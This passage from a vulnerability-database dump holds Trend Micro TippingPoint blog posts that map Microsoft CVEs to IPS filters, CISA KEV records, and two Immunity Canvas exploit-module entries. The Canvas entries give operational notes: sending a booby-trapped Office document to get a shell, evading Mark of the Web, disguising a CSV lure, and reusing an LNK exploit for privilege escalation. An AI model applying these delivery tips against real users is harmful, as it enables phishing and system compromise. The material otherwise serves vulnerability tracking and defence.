| | No Vendor Intelligence Provided \nCVE-2017-8577 | 29054 | \nCVE-2017-8578 | 29055 | \nCVE-2017-8580 | | Insufficient Vendor Information \nCVE-2017-8581 | | No Vendor Intelligence Provided \nCVE-2017-8582 | | No Vendor Intelligence Provided \nCVE-2017-8584 | | No Vendor Intelligence Provided \nCVE-2017-8585 | | No Vendor Intelligence Provided \nCVE-2017-8587 | | No Vendor Intelligence Provided \nCVE-2017-8588 | | No Vendor Intelligence Provided \nCVE-2017-8589 | | No Vendor Intelligence Provided \nCVE-2017-8590 | | No Vendor Intelligence Provided \nCVE-2017-8592 | 29048 | 
\nCVE-2017-8594 | 29046 | \nCVE-2017-8595 | | No Vendor Intelligence Provided \nCVE-2017-8596 | | No Vendor Intelligence Provided \nCVE-2017-8598 | 29050 | \nCVE-2017-8599 | | No Vendor Intelligence Provided \nCVE-2017-8601 | 29047 | \nCVE-2017-8602 | | No Vendor Intelligence Provided \nCVE-2017-8603 | | No Vendor Intelligence Provided \nCVE-2017-8604 | | No Vendor Intelligence Provided \nCVE-2017-8605 | 29049 | \nCVE-2017-8606 | | No Vendor Intelligence Provided \nCVE-2017-8607 | | No Vendor Intelligence Provided \nCVE-2017-8608 | | No Vendor Intelligence Provided \nCVE-2017-8609 | | No Vendor Intelligence Provided \nCVE-2017-8610 | | No Vendor Intelligence Provided \nCVE-2017-8611 | | No Vendor Intelligence Provided \nCVE-2017-8617 | 29056 | \nCVE-2017-8618 | 29045 | \nCVE-2017-8619 | 29057 | \n \n \n\n**End of Sale/End of Life Announcement for TippingPoint N-Series (S660N and S1400N)**\n\nLast week, we announced the end-of-sale (EOS) and end-of-life (EOL) dates for the TippingPoint N-Series solutions (S660N and S1400N). The last day to order the affected products is September 30, 2017 while quantities last. Customers with active maintenance contracts will continue to receive support from TippingPoint\u2019s Technical Assistance Center (TAC) for five years after the end-of-sale date. Maintenance contracts can continue to be purchased to cover the five years of support following the end-of-sale date, however, they must be purchased during the first two years following the end-of-sale date as described in the table below. 
Maintenance contracts cannot be extended beyond the end-of-support date.\n\n**_Impacted Product SKUs and Descriptions_**\n\n**Part Number (HP/Trend Micro)** | **Device Description** | **End of Sale Date** \n---|---|--- \nJC019A/TPNN0020 | TippingPoint S660N Intrusion Prevention System | September 30, 2017 \nJC020A/TPNN0023 | TippingPoint S1400N Intrusion Prevention System | September 30, 2017 \n \n \n\n**_Product End of Life Dates_**\n\n**Milestone** | **Definition** | **End of Sale Date** \n---|---|--- \nEnd of Sale Announcement | The date on which Trend Micro announces the upcoming end of sale and end of support of a product. | July 7, 2017 \nEnd of Sale (Appliance) | The last date to order a product through Trend Micro point of sale. The product is removed from the price list after this date. | September 30, 2017 \nEnd of Sale (Maintenance Renewals) | The last date to order maintenance renewals. | September 30, 2019 \nEnd of Support | The last date that support calls will be accepted for the affected product. RMAs will cease after this date. Digital Vaccine and ThreatDV updates will cease for the affected products after this date. | September 30, 2022 \n \n \n\nWe recommend that customers upgrade to the most current TippingPoint security platforms. At the time of this bulletin, the Threat Protection System (TPS) models 440T, 2200T and vTPS are the most comparable models to the 660N and 1400N. 
Contact your sales representative for more information:\n\n| \n\n * TippingPoint 440T Threat Protection System (TPNN0002)\n * TippingPoint 2200T Threat Protection System (TPNN0005)\n * TippingPoint 2600NX Intrusion Prevention System (TPNN0048)\n * Virtual Threat Protection System (TPTN0060) \n---|--- \n| \n \nCustomers with concerns or questions regarding this issue can contact the Trend Micro TippingPoint Technical Assistance Center (TAC).\n\n**Zero-Day Filters**\n\nThere is one new zero-day filter covering one vendor in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Linksys (1)_**\n\n| \n\n * 29060: ZDI-CAN-4892: Zero Day Initiative Vulnerability (Linksys WVBR0)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-july-3-2017/>).", "cvss3": {}, "published": "2017-07-14T12:00:02", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of July 10, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8617", "CVE-2017-8608", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8501", "CVE-2017-8502", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8587", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8610", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8570", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", 
"CVE-2017-8594", "CVE-2017-8560", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8559", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8584", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-0243", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8569", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2017-07-14T12:00:02", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-july-10-2017/", "id": "TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-27T11:16:56", "description": "\n\n\u201cWhat can you sit on, sleep on, and brush your teeth with?\u201d This was the question posed to Steve Martin\u2019s character C.D. Bales in the 1987 movie Roxanne. In a modern take of Edmond Rostand's 1897 verse play Cyrano de Bergerac, the movie centers around C.D.\u2019s attempt to win the love of a woman while navigating life with his unusually large nose. When C.D. wonders what the point of the question is, his god sister responds, \u201cThe point is that sometimes the answer is so obvious, you don't even realize it. It's as plain as the nose on your face.\u201d By the way, the answer to the question is so obvious: a chair, a bed, and a toothbrush.\n\nAt the Gartner Security and Risk Summit in Washington, D.C., held earlier this week, I heard a recurring theme across the various sessions I attended. The theme was around the fact that the discipline of patching isn\u2019t where it needs to be. 
As we witnessed with the recent WannaCry ransomware attack, which utilized vulnerabilities that were disclosed by The Shadow Brokers and subsequently patched by Microsoft, many organizations were still affected because they hadn\u2019t patched their systems. The general guidance given at various sessions: Patch your systems. While the answer is so obvious, it may not be practical for some organizations, especially those with thousands of systems. Our solutions can help through the use of \u201cvirtual patching.\u201d While virtual patching is a term that is now pretty common in the security world, where we stand out is when vulnerabilities haven\u2019t been patched by the vendor. If a vulnerability comes to us via the Zero Day Initiative, we will have protection for our customers ahead of a patch that\u2019s made available by the vendor. This is even more important if a vulnerability is brought to us for a solution that is no longer supported by the vendor. Interestingly enough, with this month\u2019s Microsoft Patch Tuesday, Microsoft has issued SMB patches for Windows XP, which reached its end of support deadline in April 2014. While Microsoft states that doing this is an exception and not the norm, it could create a false \u201csafety net\u201d for those who haven\u2019t upgraded their systems. The precedent that this might set in the future is an answer that isn\u2019t so obvious.\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before June 13, 2017. Microsoft released patches for almost 100 new CVEs in Internet Explorer, Edge, Office, Windows, and Skype. A total of 18 of these CVEs are rated Critical. The following table maps Digital Vaccine filters to the Microsoft updates. 
You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [June 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/6/13/the-june-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0173 | | No Vendor Intelligence Provided \nCVE-2017-0193 | | No Vendor Intelligence Provided \nCVE-2017-0215 | 28628 | \nCVE-2017-0216 | | No Vendor Intelligence Provided \nCVE-2017-0218 | | No Vendor Intelligence Provided \nCVE-2017-0219 | | No Vendor Intelligence Provided \nCVE-2017-0260 | | No Vendor Intelligence Provided \nCVE-2017-0282 | | No Vendor Intelligence Provided \nCVE-2017-0283 | | No Vendor Intelligence Provided \nCVE-2017-0284 | | No Vendor Intelligence Provided \nCVE-2017-0285 | | No Vendor Intelligence Provided \nCVE-2017-0286 | | No Vendor Intelligence Provided \nCVE-2017-0287 | | No Vendor Intelligence Provided \nCVE-2017-0288 | | No Vendor Intelligence Provided \nCVE-2017-0289 | | No Vendor Intelligence Provided \nCVE-2017-0291 | | No Vendor Intelligence Provided \nCVE-2017-0292 | | No Vendor Intelligence Provided \nCVE-2017-0294 | | No Vendor Intelligence Provided \nCVE-2017-0295 | | No Vendor Intelligence Provided \nCVE-2017-0296 | | Insufficient Vendor Information \nCVE-2017-0297 | | No Vendor Intelligence Provided \nCVE-2017-0298 | | No Vendor Intelligence Provided \nCVE-2017-0299 | | No Vendor Intelligence Provided \nCVE-2017-0300 | | No Vendor Intelligence Provided \nCVE-2017-8460 | | No Vendor Intelligence Provided \nCVE-2017-8461 | | No Vendor Intelligence Provided \nCVE-2017-8462 | | No Vendor Intelligence Provided \nCVE-2017-8464 | 28614 | \nCVE-2017-8465 | 28616 | \nCVE-2017-8466 | 28618 | \nCVE-2017-8468 | 28620 | \nCVE-2017-8469 | | No Vendor Intelligence Provided \nCVE-2017-8470 | | No Vendor Intelligence Provided \nCVE-2017-8471 | | No Vendor Intelligence Provided \nCVE-2017-8472 | | No Vendor 
Intelligence Provided \nCVE-2017-8473 | | No Vendor Intelligence Provided \nCVE-2017-8474 | | No Vendor Intelligence Provided \nCVE-2017-8475 | | No Vendor Intelligence Provided \nCVE-2017-8476 | | No Vendor Intelligence Provided \nCVE-2017-8477 | | No Vendor Intelligence Provided \nCVE-2017-8478 | | No Vendor Intelligence Provided \nCVE-2017-8479 | | No Vendor Intelligence Provided \nCVE-2017-8480 | | No Vendor Intelligence Provided \nCVE-2017-8481 | | No Vendor Intelligence Provided \nCVE-2017-8482 | | No Vendor Intelligence Provided \nCVE-2017-8483 | | No Vendor Intelligence Provided \nCVE-2017-8484 | | No Vendor Intelligence Provided \nCVE-2017-8485 | | No Vendor Intelligence Provided \nCVE-2017-8487 | | No Vendor Intelligence Provided \nCVE-2017-8488 | | No Vendor Intelligence Provided \nCVE-2017-8489 | | No Vendor Intelligence Provided \nCVE-2017-8490 | | No Vendor Intelligence Provided \nCVE-2017-8491 | | No Vendor Intelligence Provided \nCVE-2017-8492 | | No Vendor Intelligence Provided \nCVE-2017-8493 | | No Vendor Intelligence Provided \nCVE-2017-8494 | | No Vendor Intelligence Provided \nCVE-2017-8496 | 28613 | \nCVE-2017-8497 | 28615 | \nCVE-2017-8498 | | No Vendor Intelligence Provided \nCVE-2017-8499 | | No Vendor Intelligence Provided \nCVE-2017-8504 | | No Vendor Intelligence Provided \nCVE-2017-8506 | | No Vendor Intelligence Provided \nCVE-2017-8507 | | No Vendor Intelligence Provided \nCVE-2017-8508 | | No Vendor Intelligence Provided \nCVE-2017-8509 | 28619 | \nCVE-2017-8510 | 28621 | \nCVE-2017-8511 | | No Vendor Intelligence Provided \nCVE-2017-8512 | | No Vendor Intelligence Provided \nCVE-2017-8513 | | No Vendor Intelligence Provided \nCVE-2017-8514 | | No Vendor Intelligence Provided \nCVE-2017-8515 | | No Vendor Intelligence Provided \nCVE-2017-8517 | | No Vendor Intelligence Provided \nCVE-2017-8519 | | No Vendor Intelligence Provided \nCVE-2017-8520 | | No Vendor Intelligence Provided \nCVE-2017-8521 | | No Vendor Intelligence Provided 
\nCVE-2017-8522 | | No Vendor Intelligence Provided \nCVE-2017-8523 | | No Vendor Intelligence Provided \nCVE-2017-8524 | 28622 | \nCVE-2017-8527 | | No Vendor Intelligence Provided \nCVE-2017-8528 | | No Vendor Intelligence Provided \nCVE-2017-8529 | | Insufficient Vendor Information \nCVE-2017-8530 | | No Vendor Intelligence Provided \nCVE-2017-8531 | | No Vendor Intelligence Provided \nCVE-2017-8532 | | No Vendor Intelligence Provided \nCVE-2017-8533 | | No Vendor Intelligence Provided \nCVE-2017-8534 | | No Vendor Intelligence Provided \nCVE-2017-8543 | 28629 | \nCVE-2017-8544 | | No Vendor Intelligence Provided \nCVE-2017-8545 | | No Vendor Intelligence Provided \nCVE-2017-8547 | 28611 | \nCVE-2017-8548 | | No Vendor Intelligence Provided \nCVE-2017-8549 | | No Vendor Intelligence Provided \nCVE-2017-8550 | | No Vendor Intelligence Provided \nCVE-2017-8551 | | No Vendor Intelligence Provided \nCVE-2017-8553 | | No Vendor Intelligence Provided \nCVE-2017-8554 | | No Vendor Intelligence Provided \nCVE-2017-8555 | | No Vendor Intelligence Provided \n \n \n\n**Zero-Day Filters**\n\nThere are 11 new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. 
You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (5)_**\n\n| \n\n * 28543: ZDI-CAN-4719: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28544: ZDI-CAN-4729: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28546: ZDI-CAN-4730: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28547: ZDI-CAN-4731: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28548: ZDI-CAN-4732: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)**_ _** \n---|--- \n| \n \n**_Trend Micro (5)_**\n\n| \n\n * 28536: ZDI-CAN-4652: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28537: ZDI-CAN-4653: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28538: ZDI-CAN-4659: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28541: ZDI-CAN-4664: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28542: ZDI-CAN-4671,4675: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)**_ _** \n---|--- \n| \n \n**_Hewlett Packard Enterprise (1)_**\n\n| \n\n * 28608: HTTPS: HPE Network Automation RedirectServlet SQL Injection Vulnerability (ZDI-17-331)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-5-2017/>).", "cvss3": {}, "published": "2017-06-16T12:00:40", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of June 12, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8461", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", 
"CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8506", "CVE-2017-8464", "CVE-2017-8508", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8513", "CVE-2017-8550", "CVE-2017-8492", "CVE-2017-8496", "CVE-2017-8543", "CVE-2017-8545", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8507", "CVE-2017-8474", "CVE-2017-8487", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-8509", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8551", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8512", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8520", "CVE-2017-8519", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8511", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0295", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-8510", "CVE-2017-8514", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8497", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8534", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "modified": "2017-06-16T12:00:40", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-12-2017/", "id": "TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2021-07-28T14:33:19", "description": "**Name**| special_lnk \n---|--- \n**CVE**| CVE-2017-8464 \n**Exploit Pack**| 
[CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| special_lnk \n**Notes**| References: ['https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464', 'http://paper.seebug.org/357/', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] \nCVE Name: CVE-2017-8464 \nVENDOR: Microsoft \nNOTES: \n**DIALOG BOX** \nIn the dialog box, both remote and local paths can be specified in such a way \nthat the LNK and DLL-based callback can be hosted by Canvas. To make Canvas \nput the correct IP in for your own system, start the SMB path with \\HOSTLOCAL. \nOther names than HOSTLOCAL can be entered as well, but HOSTLOCAL will be replaced \nwith the IP that your callback is listening on. \n \nShould you want to create the LNK and DLL for distribution via other means, using \ndisk-paths such as C:\\users\\target\\callback.dll will work. \n \n**NOTE** : To reiterate: an LNK path starting with \\HOSTLOCAL will tell the \nmodule to host the LNK itself. If you do not want this to happen, simply specify \nan on-disk path. \n \nTested on: \n\\- Windows 10 (64 bit) with (local + remote) DLL path \n\\- Windows 8 (32 bit) with local DLL path \n\\- Windows 7 (32 bit) with (local + remote) DLL path \n \n**HIGHLY IMPORTANT NOTE** \nIn our testing, we have discovered that this exploit is not just a clientside. \nOn multiple Windows 10 x64 systems we have noticed that in certain repeatable \ncircumstances, SearchProtocolHost.exe, a SYSTEM-privileged process, will \nrender the LNK. This behavior has not been observed on Windows 7 or Windows 8. \n \n**In order to use this exploit as an LPE, just rename the original LNK after \nyou have a shell** \n \nWe have observed in our labs that using a UNC path that maps to a WebDAV share \nis incredibly slow regardless of the software behind the share. For this reason \nwe recommend the use of an SMB share for remote/clientside exploitation where \ndelivery of only the LNK is possible. 
\n \nSpecial thanks to Haifei Li and VXJump for their analysis. \n \nDate public: 06/27/2017 \nCVE Url: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8464 \nCVSS: 7.5 \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "canvas", "title": "Immunity Canvas: SPECIAL_LNK", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2017-06-15T01:29:00", "id": "SPECIAL_LNK", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/special_lnk", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:12", "description": "**Name**| office_wsdl \n---|--- \n**CVE**| CVE-2017-8759, CVE-2017-8570 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Microsoft Office Moniker/WSDL C# Injection \n**Notes**| CVE Name: CVE-2017-8759, CVE-2017-8570 \nVENDOR: https://office.com \nNotes: \nSend the resulting document to someone and have them open it. 
If the \ntarget is vulnerable, you will get a Powershell-MOSDEF shell. \n \nIMPORTANT NOTE: the WSDL server needs to listen on port 80. Even if \nthe URIs are updated with the correct port, the exploit will not \nsucceed. \n \nMOTW is defined as the \"Mark of the Web\". In the Windows Operating \nSystem, MOTW is an alternate datastream (whose name is Zone.Information) \nthat applications are supposed to apply to files that come from any \nuntrusted source. The ADS contains the name of the zone of the file's \norigination. It is used as a hint to applications that they should not \ntrust the file's contents. \n \nPPSX Notes \n\\---------------------------------------- \nIf this file is tagged with MOTW on the target machine, the exploit \nwill not work. This will happen if it is downloaded from a remote zone \nin IE, for example. If you cannot avoid MOTW, use CSV phishing method \nIn that case, the user is more likely to click the 'update content' \n(or 'edit content') prompt because that is both are not security \nwarnings, and the file format lends itself to editing. PPSX is a \nslideshow format, which is not intended to be edited and is not \ntreated as such in PowerPoint. However, if you can avoid MOTW, PPSX \nrequires no interaction whatsoever to work. \n \nYou can edit the PPSX (you may need to rename it to PPTX before opening \nit in Office) to contain different slide data. As of CEU time, it is \nbest to not edit the embedded file, as that is how the moniker is \nembedded. \n \nCSV Notes \n\\---------------------------------------- \nEdit the template .csv to contain realistic data. Otherwise, it will \nappear to be a blank CSV file upon first glance. If the target has a \ncomically large monitor, add more rows to make the '#N/A' appear on \na non-visable part of the screen. 
\n \n \nVulnerability Notes \n\\---------------------------------------- \nAs Haifei Li notes, there are two vulnerabilities at work: the moniker \nbinding issue (where \"binding an object to a moniker\" means \ndeserialization in Microsoft's lexicon) and the issue triggered by \ninstantiation of the class upon deserialization. \n \nNOTE: For reasons implied above, that there are multiple ways a target \ncould be patched against this issue: \na) .NET updates will close the bug in wsdlparser.cs that allows code \ninjection into the remoting class \nb) Office updates will disallow binding of the soap:wsdl moniker that \nis necessary to trigger the remoting code compilation \n \nTested Operating Systems: \n* Office 2013 (no patches) - Windows 7 32 bit \n \nRepeatability: Infinite \nReferences: ['https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759', 'https://twitter.com/buffaloverflow/status/908455053345869825', 'https://www.mdsec.co.uk/2017/09/exploiting-cve-2017-8759-soap-wsdl-parser-code-injection/', 'https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html', 'http://justhaifei1.blogspot.com/2017/07/bypassing-microsofts-cve-2017-0199-patch.html'] \nCVE URL: \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-13T01:29:00", "type": "canvas", "title": "Immunity Canvas: OFFICE_WSDL", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570", "CVE-2017-0199", "CVE-2017-8759"], "modified": "2017-09-13T01:29:00", "id": "OFFICE_WSDL", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/office_wsdl", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Windows Shell in multiple versions of Microsoft Windows allows local users or remote attackers to execute arbitrary code via a crafted .LNK file", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Shell (.lnk) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-8464", "href": "", "cvss": 
{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-25T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2022-02-25T00:00:00", "id": "CISA-KEV-CVE-2017-8570", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-07-20T20:12:19", "description": "Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. 
